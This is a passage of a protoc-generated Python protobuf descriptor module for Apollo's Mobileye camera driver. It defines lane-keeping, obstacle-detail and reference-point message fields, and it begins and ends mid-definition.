serialized_pb=_b('\n$modules/drivers/proto/mobileye.proto\x12\x0e\x61pollo.drivers\x1a!modules/common/proto/header.proto\"\xa3\x01\n\x07Lka_768\x12\x11\n\tlane_type\x18\x01 \x01(\x05\x12\x0f\n\x07quality\x18\x02 \x01(\x05\x12\x14\n\x0cmodel_degree\x18\x03 \x01(\x05\x12\x10\n\x08position\x18\x04 \x01(\x01\x12\x11\n\tcurvature\x18\x05 \x01(\x01\x12\x1c\n\x14\x63urvature_derivative\x18\x06 \x01(\x01\x12\x1b\n\x13width_right_marking\x18\x07 \x01(\x01\"1\n\x07Num_76b\x12&\n\x1enum_of_next_lane_mark_reported\x18\x01 \x01(\x05\"\xea\x01\n\x0f\x41\x66termarket_669\x12\x16\n\x0elane_conf_left\x18\x01 \x01(\x05\x12\x1d\n\x15ldw_availability_left\x18\x02 \x01(\x08\x12\x16\n\x0elane_type_left\x18\x03 \x01(\x05\x12\x1a\n\x12\x64istance_to_lane_l\x18\x04 \x01(\x01\x12\x17\n\x0flane_conf_right\x18\x05 \x01(\x05\x12\x1e\n\x16ldw_availability_right\x18\x06 \x01(\x08\x12\x17\n\x0flane_type_right\x18\x07 \x01(\x05\x12\x1a\n\x12\x64istance_to_lane_r\x18\x08 \x01(\x01\"U\n\x07Lka_769\x12\x15\n\rheading_angle\x18\x01 \x01(\x01\x12\x12\n\nview_range\x18\x02 \x01(\x01\x12\x1f\n\x17view_range_availability\x18\x03 \x01(\x08\"\xc3\x01\n\rReference_76a\x12\x1c\n\x14ref_point_1_position\x18\x01 \x01(\x01\x12\x1c\n\x14ref_point_1_distance\x18\x02 \x01(\x01\x12\x1c\n\x14ref_point_1_validity\x18\x03 \x01(\x08\x12\x1c\n\x14ref_point_2_position\x18\x04 \x01(\x01\x12\x1c\n\x14ref_point_2_distance\x18\x05 \x01(\x01\x12\x1c\n\x14ref_point_2_validity\x18\x06 \x01(\x08\"\x9c\x02\n\x0b\x44\x65tails_738\x12\x15\n\rnum_obstacles\x18\x01 \x01(\x05\x12\x11\n\ttimestamp\x18\x02 \x01(\x05\x12\x1b\n\x13\x61pplication_version\x18\x03 \x01(\x05\x12%\n\x1d\x61\x63tive_version_number_section\x18\x04 \x01(\x05\x12\x1e\n\x16left_close_rang_cut_in\x18\x05 \x01(\x08\x12\x1f\n\x17right_close_rang_cut_in\x18\x06 \x01(\x08\x12\n\n\x02go\x18\x07 \x01(\x05\x12\x18\n\x10protocol_version\x18\x08 \x01(\x05\x12\x11\n\tclose_car\x18\t \x01(\x08\x12\x10\n\x08\x66\x61ilsafe\x18\n \x01(\x05\x12\x13\n\x0breserved_10\x18\x0b \x01(\x05\"\xa0\x01\n\x08Next_76c\x12\x11\n\tlane_type\x18\x01 \x01(\x05\x12\x0f\n\x07quality\x18\x02 \x01(\x05\x12\x14\n\x0cmodel_degree\x18\x03 \x01(\x05\x12\x10\n\x08position\x18\x04 \x01(\x01\x12\x11\n\tcurvature\x18\x05 \x01(\x01\x12\x1c\n\x14\x63urvature_derivative\x18\x06 \x01(\x01\x12\x17\n\x0flane_mark_width\x18\x07 \x01(\x01\"\xd4\x01\n\x0b\x44\x65tails_737\x12\x16\n\x0elane_curvature\x18\x01 \x01(\x01\x12\x14\n\x0clane_heading\x18\x02 \x01(\x01\x12\x1c\n\x14\x63\x61_construction_area\x18\x03 \x01(\x08\x12\x1e\n\x16right_ldw_availability\x18\x04 \x01(\x08\x12\x1d\n\x15left_ldw_availability\x18\x05 \x01(\x08\x12\x12\n\nreserved_1\x18\x06 \x01(\x08\x12\x11\n\tyaw_angle\x18\x07 \x01(\x01\x12\x13\n\x0bpitch_angle\x18\x08 \x01(\x01\"U\n\x07Lka_767\x12\x15\n\rheading_angle\x18\x01 \x01(\x01\x12\x12\n\nview_range\x18\x02 \x01(\x01\x12\x1f\n\x17view_range_availability\x18\x03 \x01(\x08\"\xa2\x01\n\x07Lka_766\x12\x11\n\tlane_type\x18\x01 \x01(\x05\x12\x0f\n\x07quality\x18\x02 \x01(\x05\x12\x14\n\x0cmodel_degree\x18\x03 \x01(\x05\x12\x10\n\x08position\x18\x04 \x01(\x01\x12\x11\n\tcurvature\x18\x05 \x01(\x01\x12\x1c\n\x14\x63urvature_derivative\x18\x06 \x01(\x01\x12\x1a\n\x12width_left_marking\x18\x07 \x01(\x01\"V\n\x08Next_76d\x12\x15\n\rheading_angle\x18\x01 \x01(\x01\x12\x12\n\nview_range\x18\x02 \x01(\x01\x12\x1f\n\x17view_range_availability\x18\x03 \x01(\x08\"\xbe\x02\n\x0b\x44\x65tails_739\x12\x13\n\x0bobstacle_id\x18\x01 \x01(\x05\x12\x16\n\x0eobstacle_pos_x\x18\x02 \x01(\x01\x12\x11\n\treseved_2\x18\x03 \x01(\x05\x12\x16\n\x0eobstacle_pos_y\x18\x04 \x01(\x01\x12\x14\n\x0c\x62linker_info\x18\x05 \x01(\x05\x12\x16\n\x0e\x63ut_in_and_out\x18\x06 \x01(\x05\x12\x1a\n\x12obstacle_rel_vel_x\x18\x07 \x01(\x01\x12\x15\n\robstacle_type\x18\x08 \x01(\x05\x12\x12\n\nreserved_3\x18\t \x01(\x08\x12\x17\n\x0fobstacle_status\x18\n \x01(\x05\x12\x1d\n\x15obstacle_brake_lights\x18\x0b \x01(\x08\x12\x12\n\nreserved_4\x18\x0c \x01(\x05\x12\x16\n\x0eobstacle_valid\x18\r \x01(\x05\"\x9e\x02\n\x0b\x44\x65tails_73a\x12\x17\n\x0fobstacle_length\x18\x01 \x01(\x01\x12\x16\n\x0eobstacle_width\x18\x02 \x01(\x01\x12\x14\n\x0cobstacle_age\x18\x03 \x01(\x05\x12\x15\n\robstacle_lane\x18\x04 \x01(\x05\x12\x11\n\tcipv_flag\x18\x05 \x01(\x08\x12\x12\n\nreserved_5\x18\x06 \x01(\x08\x12\x13\n\x0bradar_pos_x\x18\x07 \x01(\x01\x12\x13\n\x0bradar_vel_x\x18\x08 \x01(\x01\x12\x1e\n\x16radar_match_confidence\x18\t \x01(\x05\x12\x12\n\nreserved_6\x18\n \x01(\x08\x12\x18\n\x10matched_radar_id\x18\x0b \x01(\x05\x12\x12\n\nreserved_7\x18\x0c \x01(\x08\"\xbc\x01\n\x0b\x44\x65tails_73b\x12\x1b\n\x13obstacle_angle_rate\x18\x01 \x01(\x01\x12\x1d\n\x15obstacle_scale_change\x18\x02 \x01(\x01\x12\x16\n\x0eobject_accel_x\x18\x03 \x01(\x01\x12\x12\n\nreserved_8\x18\x04 \x01(\x05\x12\x19\n\x11obstacle_replaced\x18\x05 \x01(\x08\x12\x12\n\nreserved_9\x18\x06 \x01(\x05\x12\x16\n\x0eobstacle_angle\x18\x07 \x01(\x01\"\xc5\x05\n\x08Mobileye\x12%\n\x06header\x18\x01 \x01(\x0b\x32\x15.apollo.common.Header\x12\x38\n\x0f\x61\x66termarket_669\x18\x02 \x01(\x0b\x32\x1f.apollo.drivers.Aftermarket_669\x12\x30\n\x0b\x64\x65tails_737\x18\x03 \x01(\x0b\x32\x1b.apollo.drivers.Details_737\x12\x30\n\x0b\x64\x65tails_738\x18\x04 \x01(\x0b\x32\x1b.apollo.drivers.Details_738\x12\x30\n\x0b\x64\x65tails_739\x18\x05 \x03(\x0b\x32\x1b.apollo.drivers.Details_739\x12\x30\n\x0b\x64\x65tails_73a\x18\x06 \x03(\x0b\x32\x1b.apollo.drivers.Details_73a\x12\x30\n\x0b\x64\x65tails_73b\x18\x07 \x03(\x0b\x32\x1b.apollo.drivers.Details_73b\x12(\n\x07lka_766\x18\x08 \x01(\x0b\x32\x17.apollo.drivers.Lka_766\x12(\n\x07lka_767\x18\t \x01(\x0b\x32\x17.apollo.drivers.Lka_767\x12(\n\x07lka_768\x18\n \x01(\x0b\x32\x17.apollo.drivers.Lka_768\x12(\n\x07lka_769\x18\x0b \x01(\x0b\x32\x17.apollo.drivers.Lka_769\x12\x34\n\rreference_76a\x18\x0c \x01(\x0b\x32\x1d.apollo.drivers.Reference_76a\x12(\n\x07num_76b\x18\r \x01(\x0b\x32\x17.apollo.drivers.Num_76b\x12*\n\x08next_76c\x18\x0e \x03(\x0b\x32\x18.apollo.drivers.Next_76c\x12*\n\x08next_76d\x18\x0f \x03(\x0b\x32\x18.apollo.drivers.Next_76d')
,
dependencies=[modules_dot_common_dot_proto_dot_header__pb2.DESCRIPTOR,])
_LKA_768 = _descriptor.Descriptor(
name='Lka_768',
full_name='apollo.drivers.Lka_768',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='lane_type', full_name='apollo.drivers.Lka_768.lane_type', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='quality', full_name='apollo.drivers.Lka_768.quality', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='model_degree', full_name='apollo.drivers.Lka_768.model_degree', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='position', full_name='apollo.drivers.Lka_768.position', index=3,
number=4, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='curvature', full_name='apollo.drivers.Lka_768.curvature', index=4,
number=5, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='curvature_derivative', full_name='apollo.drivers.Lka_768.curvature_derivative', index=5,
number=6, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='width_right_marking', full_name='apollo.drivers.Lka_768.width_right_marking', index=6,
number=7, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=92,
serialized_end=255,
)
_NUM_76B = _descriptor.Descriptor(
name='Num_76b',
full_name='apollo.drivers.Num_76b',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='num_of_next_lane_mark_reported', full_name='apollo.drivers.Num_76b.num_of_next_lane_mark_reported', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=257,
serialized_end=306,
)
_AFTERMARKET_669 = _descriptor.Descriptor(
name='Aftermarket_669',
full_name='apollo.drivers.Aftermarket_669',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='lane_conf_left', full_name='apollo.drivers.Aftermarket_669.lane_conf_left', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='ldw_availability_left', full_name='apollo.drivers.Aftermarket_669.ldw_availability_left', index=1,
number=2, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='lane_type_left', full_name='apollo.drivers.Aftermarket_669.lane_type_left', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='distance_to_lane_l', full_name='apollo.drivers.Aftermarket_669.distance_to_lane_l', index=3,
number=4, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='lane_conf_right', full_name='apollo.drivers.Aftermarket_669.lane_conf_right', index=4,
number=5, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='ldw_availability_right', full_name='apollo.drivers.Aftermarket_669.ldw_availability_right', index=5,
number=6, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='lane_type_right', full_name='apollo.drivers.Aftermarket_669.lane_type_right', index=6,
number=7, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='distance_to_lane_r', full_name='apollo.drivers.Aftermarket_669.distance_to_lane_r', index=7,
number=8, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=309,
serialized_end=543,
)
_LKA_769 = _descriptor.Descriptor(
name='Lka_769',
full_name='apollo.drivers.Lka_769',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='heading_angle', full_name='apollo.drivers.Lka_769.heading_angle', index=0,
number=1, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='view_range', full_name='apollo.drivers.Lka_769.view_range', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='view_range_availability', full_name='apollo.drivers.Lka_769.view_range_availability', index=2,
number=3, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=545,
serialized_end=630,
)
_REFERENCE_76A = _descriptor.Descriptor(
name='Reference_76a',
full_name='apollo.drivers.Reference_76a',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='ref_point_1_position', full_name='apollo.drivers.Reference_76a.ref_point_1_position', index=0,
number=1, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='ref_point_1_distance', full_name='apollo.drivers.Reference_76a.ref_point_1_distance', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='ref_point_1_validity', full_name='apollo.drivers.Reference_76a.ref_point_1_validity', index=2,
number=3, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='ref_point_2_position', full_name='apollo.drivers.Reference_76a.ref_point_2_position', index=3,
number=4, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='ref_point_2_distance', full_name='apollo.drivers.Reference_76a.ref_point_2_distance', index=4,
number=5, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='ref_point_2_validity', full_name='apollo.drivers.Reference_76a.ref_point_2_validity', index=5,
number=6, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=633,
serialized_end=828,
)
_DETAILS_738 = _descriptor.Descriptor(
name='Details_738',
full_name='apollo.drivers.Details_738',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='num_obstacles', full_name='apollo.drivers.Details_738.num_obstacles', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='timestamp', full_name='apollo.drivers.Details_738.timestamp', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='application_version', full_name='apollo.drivers.Details_738.application_version', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='active_version_number_section', full_name='apollo.drivers.Details_738.active_version_number_section', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='left_close_rang_cut_in', full_name='apollo.drivers.Details_738.left_close_rang_cut_in', index=4,
number=5, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='right_close_rang_cut_in', full_name='apollo.drivers.Details_738.right_close_rang_cut_in', index=5,
number=6, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='go', full_name='apollo.drivers.Details_738.go', index=6,
number=7, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='protocol_version', full_name='apollo.drivers.Details_738.protocol_version', index=7,
number=8, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='close_car', full_name='apollo.drivers.Details_738.close_car', index=8,
number=9, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='failsafe', full_name='apollo.drivers.Details_738.failsafe', index=9,
number=10, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='reserved_10', full_name='apollo.drivers.Details_738.reserved_10', index=10,
number=11, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=831,
serialized_end=1115,
)
_NEXT_76C = _descriptor.Descriptor(
name='Next_76c',
full_name='apollo.drivers.Next_76c',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='lane_type', full_name='apollo.drivers.Next_76c.lane_type', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='quality', full_name='apollo.drivers.Next_76c.quality', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='model_degree', full_name='apollo.drivers.Next_76c.model_degree', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='position', full_name='apollo.drivers.Next_76c.position', index=3,
number=4, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='curvature', full_name='apollo.drivers.Next_76c.curvature', index=4,
number=5, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='curvature_derivative', full_name='apollo.drivers.Next_76c.curvature_derivative', index=5,
number=6, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='lane_mark_width', full_name='apollo.drivers.Next_76c.lane_mark_width', index=6,
number=7, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=1118,
serialized_end=1278,
)
_DETAILS_737 = _descriptor.Descriptor(
name='Details_737',
full_name='apollo.drivers.Details_737',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='lane_curvature', full_name='apollo.drivers.Details_737.lane_curvature', index=0,
number=1, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='lane_heading', full_name='apollo.drivers.Details_737.lane_heading', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='ca_construction_area', full_name='apollo.drivers.Details_737.ca_construction_area', index=2,
number=3, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='right_ldw_availability', full_name='apollo.drivers.Details_737.right_ldw_availability', index=3,
number=4, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='left_ldw_availability', full_name='apollo.drivers.Details_737.left_ldw_availability', index=4,
number=5, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='reserved_1', full_name='apollo.drivers.Details_737.reserved_1', index=5,
number=6, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='yaw_angle', full_name='apollo.drivers.Details_737.yaw_angle', index=6,
number=7, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='pitch_angle', full_name='apollo.drivers.Details_737.pitch_angle', index=7,
number=8, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=1281,
serialized_end=1493,
)
_LKA_767 = _descriptor.Descriptor(
name='Lka_767',
full_name='apollo.drivers.Lka_767',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='heading_angle', full_name='apollo.drivers.Lka_767.heading_angle', index=0,
number=1, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='view_range', full_name='apollo.drivers.Lka_767.view_range', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='view_range_availability', full_name='apollo.drivers.Lka_767.view_range_availability', index=2,
number=3, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=1495,
serialized_end=1580,
)
_LKA_766 = _descriptor.Descriptor(
name='Lka_766',
full_name='apollo.drivers.Lka_766',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='lane_type', full_name='apollo.drivers.Lka_766.lane_type', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='quality', full_name='apollo.drivers.Lka_766.quality', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='model_degree', full_name='apollo.drivers.Lka_766.model_degree', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='position', full_name='apollo.drivers.Lka_766.position', index=3,
number=4, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='curvature', full_name='apollo.drivers.Lka_766.curvature', index=4,
number=5, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='curvature_derivative', full_name='apollo.drivers.Lka_766.curvature_derivative', index=5,
number=6, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='width_left_marking', full_name='apollo.drivers.Lka_766.width_left_marking', index=6,
number=7, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=1583,
serialized_end=1745,
)
_NEXT_76D = _descriptor.Descriptor(
name='Next_76d',
full_name='apollo.drivers.Next_76d',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='heading_angle', full_name='apollo.drivers.Next_76d.heading_angle', index=0,
number=1, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='view_range', full_name='apollo.drivers.Next_76d.view_range', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='view_range_availability', full_name='apollo.drivers.Next_76d.view_range_availability', index=2,
number=3, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=1747,
serialized_end=1833,
)
_DETAILS_739 = _descriptor.Descriptor(
name='Details_739',
full_name='apollo.drivers.Details_739',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='obstacle_id', full_name='apollo.drivers.Details_739.obstacle_id', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='obstacle_pos_x', full_name='apollo.drivers.Details_739.obstacle_pos_x', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
